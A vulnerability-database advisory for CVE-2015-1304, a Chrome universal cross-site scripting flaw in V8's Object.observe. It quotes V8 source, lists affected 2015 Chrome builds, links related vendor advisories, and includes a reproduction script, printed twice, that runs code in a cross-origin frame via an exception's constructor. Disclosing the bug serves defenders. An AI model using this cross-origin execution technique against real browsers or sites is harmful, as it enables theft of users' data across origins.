Lucene search
RootSSV:93031HistoryApr 24, 2017 - 12:00 a.m.
Chrome Universal XSS using exceptions thrown from Object.observe (CVE-2015-1304)
2017-04-2400:00:00
Root
www.seebug.org
16
0.014 Low
EPSS
Percentile
84.8%
VULNERABILITY DETAILS
From /v8/src/object-observe.js:
function ObjectObserve(object, callback, acceptList) {
(...)
var objectObserveFn = %GetObjectContextObjectObserve(object);
return objectObserveFn(object, callback, acceptList);
}
From /v8/src/runtime/runtime-observe.cc:
RUNTIME_FUNCTION(Runtime_GetObjectContextObjectObserve) {
(...)
Handle<Context> context(object->GetCreationContext(), isolate);
return context->native_object_observe();
}
|objectObserveFn| is derived from the observed object’s creation context, potentially cross-origin. When this function is invoked, any subsequent exceptions will be created in the aforementioned context, and they’ll propagated to a try-catch handler.
VERSION
Chrome 45.0.2454.85 (Stable)
Chrome 46.0.2490.22 (Beta)
Chrome 47.0.2503.0 (Dev)
Chromium 47.0.2510.0 (Release build compiled today)
REPRODUCTION CASE
<script>
var i = document.documentElement.appendChild(document.createElement('iframe'));
i.onload = function() {
try {
Object.observe(frames[0].location, Map, 0);
} catch(e) {
e.constructor.constructor('alert(location)')();
}
}
i.src = 'https://abc.xyz';
</script>
<script>
var i = document.documentElement.appendChild(document.createElement('iframe'));
i.onload = function() {
try {
Object.observe(frames[0].location, Map, 0);
} catch(e) {
e.constructor.constructor('alert(location)')();
}
}
i.src = 'https://abc.xyz';
</script>
Related
ubuntucve
ubuntucve
CVE-2015-1304
2015-09-29 00:00:00
cve
cve
CVE-2015-1304
2015-10-12 01:59:00
prion
prion
Design/Logic Flaw
2015-10-12 01:59:00
debiancve
debiancve
CVE-2015-1304
2015-10-12 01:59:00
nessus
nessus
Google Chrome < 45.0.2454.101 Multiple Vulnerabilities
2015-12-04 00:00:00
openSUSE Security Update : Chromium (openSUSE-2015-649)
2015-10-12 00:00:00
Google Chrome < 45.0.2454.101 Multiple Vulnerabilities
2015-09-30 00:00:00
securityvulns
securityvulns
[USN-2757-1] Oxide vulnerabilities
2015-10-11 00:00:00
Oxide security vulnerabilities
2015-10-11 00:00:00
Google Chrome / Chromium / Oxide multiple security vulnerabilities
2015-10-25 00:00:00
chrome
chrome
Stable Channel Update
2015-09-24 00:00:00
openvas
openvas
Google Chrome Multiple Vulnerabilities-02 (Oct 2015) - Linux
2015-10-19 00:00:00
Google Chrome Multiple Vulnerabilities-02 (Oct 2015) - Mac OS X
2015-10-19 00:00:00
Ubuntu: Security Advisory (USN-2757-1)
2015-10-06 00:00:00
redhat
redhat
(RHSA-2015:1841) Important: chromium-browser security update
2015-09-29 00:00:00
archlinux
archlinux
chromium: cross-origin bypass
2015-09-28 00:00:00
suse
suse
Security update for Chromium (important)
2015-11-02 16:35:34
Security update for Chromium (important)
2015-10-11 14:09:40
kaspersky
kaspersky
KLA10673 Security bypass vulnerabilties at Google Chrome
2015-09-24 00:00:00
mageia
mageia
Updated chromium-browser packages fix security vulnerabilities
2015-10-04 00:15:27
freebsd
freebsd
chromium -- multiple vulnerabilities
2015-09-24 00:00:00
ubuntu
ubuntu
Oxide vulnerabilities
2015-10-05 00:00:00
osv
osv
chromium-browser - security update
2015-10-20 00:00:00
debian
debian
[SECURITY] [DSA 3376-1] chromium-browser security update
2015-10-21 03:08:24
[SECURITY] [DSA 3376-1] chromium-browser security update
2015-10-21 03:08:24
gentoo
gentoo
Chromium: Multiple vulnerabilities
2016-03-12 00:00:00